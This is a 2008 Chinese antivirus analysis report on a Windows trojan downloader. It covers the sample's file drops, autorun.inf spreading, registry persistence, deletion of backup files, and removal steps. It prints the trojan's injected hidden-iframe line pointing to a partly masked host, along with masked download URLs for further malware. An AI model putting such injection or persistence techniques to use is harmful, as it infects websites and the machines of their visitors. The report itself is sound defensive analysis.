安全响应·Security
病毒分析报告·Report

Trojan-Downloader.Win32.Small.ios分析

出处:安天病毒分析组 时间:2008-02-28 10:00

病毒标签:

病毒名称: Trojan-Downloader.Win32.Small.ios
病毒类型: 木马类
文件 MD5: CA775975ABF4B1ED39DB043974683D2C
公开范围: 完全公开
危害等级: 4
文件长度: 33,932 字节
感染系统: Windows98以上版本
开发工具: Borland Delphi 6.0 - 7.0
加壳类型: eXPressor 1.3.0 -> CGSoftLabs
病毒描述:

  该病毒属木马类,病毒运行后判断当前运行文件的路径,如果不是%System32%
\SVCH0ST.EXE,将打开当前文件所在目录;制自身到%System32%下,更名为
SVSH0ST.EXE,并衍生autorun.inf文件;复制自身到所有驱动器根目录下,更名为
niu.exe,并衍生autorun.inf文件,实现双击打开驱动器时,自动运行病毒文件;
遍历所有驱动器,在htm、asp、aspx、php、html、jsp格式文件的尾部插入96个字
节的病毒代码;遍历磁盘删除以GHO为扩展名的文件,使用户无法进行系统还原;连
接网络下载病毒文件;修改系统时间为2000年;病毒运行后删除自身。
行为分析:

本地行为:

1、文件运行后会释放以下文件:

    %System%\Autorun.inf     159 字节
    %WinDir%\SVSH0ST.EXE     33,932 字节
    %HomeDrive%\Autorun.inf    159 字节
    %HomeDrive%\niu.exe      33,932 字节
    %DriveLetter%\Autorun.inf   159 字节
    %DriveLetter%\niu.exe     33,932 字节
  
2、新增注册表:

    [HKEY_LOCAL_MACHINE\SOFTWARE
    \Microsoft\Windows\CurrentVersion\Run]
    注册表值: "svchost"
    类型: REG_SZ
    值: "C:\WINDOWS\system32\SVSH0ST.EXE"
    描述: 启动项,使病毒文件在当该系统的所有用户
    登陆该系统时,运行病毒文件。

3、搜索指定扩展名的文件,在尾部插入代码:

    指定的扩展名包括:htm、asp、aspx、php、html、js六种
    插入代码内容如下:
    <IfrAmE src=http://www.2****.com.cn width=0 height=0></IfrAmE>

网络行为:

连接网络下载病毒文件:

    http://www.2****.com.cn/30000/1.exe
    http://www.2****.com.cn/30000/2.exe
    http://www.2****.com.cn/30000/3.exe
    http://www.2****.com.cn/30000/4.exe
    http://www.2****.com.cn/30000/5.exe

注: %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的
位置。
  
    %Windir%             WINDODWS所在目录
    %DriveLetter%          逻辑驱动器根目录
    %ProgramFiles%          系统程序默认安装目录
    %HomeDrive%           当前启动的系统的所在分区
    %Documents and Settings%    当前用户文档根目录
    %Temp%             \Documents and Settings
                    \当前用户\Local Settings\Temp
    %System32%           系统的 System32文件夹
    
    Windows2000/NT中默认的安装路径是C:\Winnt\System32
    windows95/98/me中默认的安装路径是C:\Windows\System
    windowsXP中默认的安装路径是C:\Windows\System32                
    
清除方案:
 

1 、使用安天防线2008可彻底清除此病毒(推荐),
   请到安天网站下载:www.antiy.com 。 
2 、手工清除请按照行为分析删除对应文件,恢复相关系统设置。  
    (1)使用安天木马防线“进程管理”关闭病毒进程:
     SVSH0ST.EXE     
    (2)删除病毒文件:
     %System%\Autorun.inf
     %WinDir%\SVSH0ST.EXE
     %HomeDrive%\Autorun.inf
     %HomeDrive%\niu.exe
     %DriveLetter%\Autorun.inf
     %DriveLetter%\niu.exe
    (3)复病毒修改的注册表项目,删除病毒添加的注册表项:
     删除如下注册表项:
     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
     \Windows\CurrentVersion\Run]
     注册表值: "svchost"
     类型: REG_SZ
     值: "C:\WINDOWS\system32\SVSH0ST.EXE"
    (4)恢复系统时间年份为2008年。
    (5)删除所有六类被感染文件尾部的代码。
附:
 


点击此处下载安天防线2008

病毒上报信箱: submit@virusview.net
[TOP]